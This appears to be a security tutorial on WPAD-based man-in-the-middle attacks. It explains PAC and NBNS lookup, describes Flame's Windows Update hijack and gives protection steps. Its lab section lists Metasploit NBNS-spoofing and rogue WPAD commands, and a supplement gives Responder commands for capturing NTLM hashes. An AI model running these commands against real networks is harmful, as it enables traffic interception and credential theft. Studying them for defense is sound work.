WPAD-based man-in-the-middle attack
0x00 Preface
The article "Windows Name Parsing Mechanism Research and defect utilization" (http://www.bkjia.com/Article/201512/452217.html) was very inspiring, so I did further research on its practical use and found that the WPAD-based man-in-the-middle attack is very interesting. The results are shared below.
0x01 Introduction
WPAD:
The Web Proxy Auto-Discovery Protocol lets the browser discover the proxy server automatically: it locates the proxy configuration file, downloads, compiles and runs it, and then uses the proxy that file names to access the network.
PAC:
The Proxy Auto-Config file defines how browsers and other user proxies automatically select an appropriate Proxy server to access a URL.
To use a PAC file, publish it on a web server and then either enter its URL on the browser's proxy settings page or let the user agent find it through the WPAD protocol.
WPAD uses a PAC file named wpad.dat. An example PAC file:
function FindProxyForURL(url, host) {
    if (url == 'http://www.baidu.com/') return 'DIRECT';
    if (host == 'twitter.com') return 'SOCKS 127.0.0.10:7070';
    if (dnsResolve(host) == '10.0.0.100') return 'PROXY 127.0.0.1:8086;DIRECT';
    return 'DIRECT';
}
0x02 WPAD principles
When the user opens a webpage, the browser first looks up the location of the PAC file. It does so as follows:
1. Use a DHCP server
The web browser sends a DHCPINFORM to the DHCP server to ask for the location of the PAC file.
The DHCP server returns a DHCPACK containing the location of the PAC file.
2. Query through DNS
The web browser sends DNS queries for names of the form wpad.<domain suffix> to the DNS server.
The DNS server returns the IP address of the WPAD host.
The web browser downloads wpad.dat from port 80 of that IP address.
3. Query through NBNS
Tips:
Windows 2000, XP and 2003 support only DNS and NetBIOS name resolution.
Windows Vista and later (including 2008, Win7, Win8.x and Win10) support DNS, NBNS and LLMNR.
If neither the DHCP nor the DNS server responds and the requested host name is not in the local name cache, the following name resolution is started:
If the system supports LLMNR (Link-Local Multicast Name Resolution), LLMNR queries are multicast first. If no response arrives, broadcast NBNS queries are sent next.
If any host answers with the PAC file location,
the web browser downloads wpad.dat from port 80 of that host's IP address.
0x03 WPAD Vulnerability
From the WPAD lookup sequence above, the weakness is not hard to see:
if an attacker spoofs the NBNS response when the client falls through to an NBNS query, the attacker can direct the victim's Internet traffic through a forged proxy server and hijack the session.
0x04 WPAD vulnerability test
Test environment:
Attacked user: Win7 x86, 192.168.16.191
Attacker: Kali Linux, 192.168.16.245
Test process:
1. Listen for NBNS queries
use auxiliary/spoof/nbns/nbns_response
set regex WPAD
set spoofip 192.168.16.245
run
2. Set the WPAD Server
use auxiliary/server/wpad
set proxy 192.168.16.245
run
3. The attacked user initiates a query
The attacked host sends a broadcast NBNS query,
because the current DHCP and DNS servers cannot provide the PAC file location.
4. Respond to broadcast NBNS queries of attacked users
The attacking host answers the broadcast NBNS query and specifies the location of the PAC file.
The attacked host then requests the PAC file from that location and downloads it.
Wireshark packet capture:
the broadcast NBNS query packet;
the NBNS query response packet;
the attacked host's request for the PAC file;
the attacker's reply carrying the PAC file.
Tips:
In a virtual machine environment, to make Wireshark capture only the local host's packets, disable promiscuous mode.
5. The attacked user accesses the Internet through the forged proxy configuration.
The attacked user's data packets can be captured on the forged proxy: the man-in-the-middle attack has succeeded.
0x05 Practical use of WPAD
How powerful can a WPAD-based man-in-the-middle attack be? The Flame malware gives a good demonstration.
It works as follows:
1. SNACK: NBNS spoofing
Listens on the current network; if a received NBNS query contains the string WPAD, it immediately forges an NBNS response.
2. MUNCH: Spoofing proxy detection and Windows Update request
Provides the WPAD service in order to change the WPAD settings of the attacked host.
Once it is acting as the attacked host's proxy, it hijacks specific Windows Update requests and serves a backdoored Windows Update file for the user to download.
A Windows Update request captured in the test environment, as seen in Burp Suite:
In the end, Flame carried out a WPAD-based man-in-the-middle attack, tampered with Windows Update data, and thereby infected other hosts on the intranet.
0x06 Protection
You can avoid this attack by disabling WPAD with the following setting:
Internet Explorer - Internet Options - Connections - LAN settings
Deselect "Automatically detect settings"
If you suspect you have been the target of an NBNS man-in-the-middle attack, check the NetBIOS name cache:
nbtstat -c
0x07 Supplement
Responder:
Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Responder can be regarded as an all-in-one tool for intranet man-in-the-middle attacks, and it is worth trying.
The following is a simple command:
git clone https://github.com/SpiderLabs/Responder.git
cd Responder/
python Responder.py -I eth0 -i 192.168.16.245 -b
When the attacked host accesses a share on the attacking host, Responder captures its hash.
0x08 Summary
Although WPAD is not a new technology, it is not widely understood, so it deserves attention during intranet penetration testing.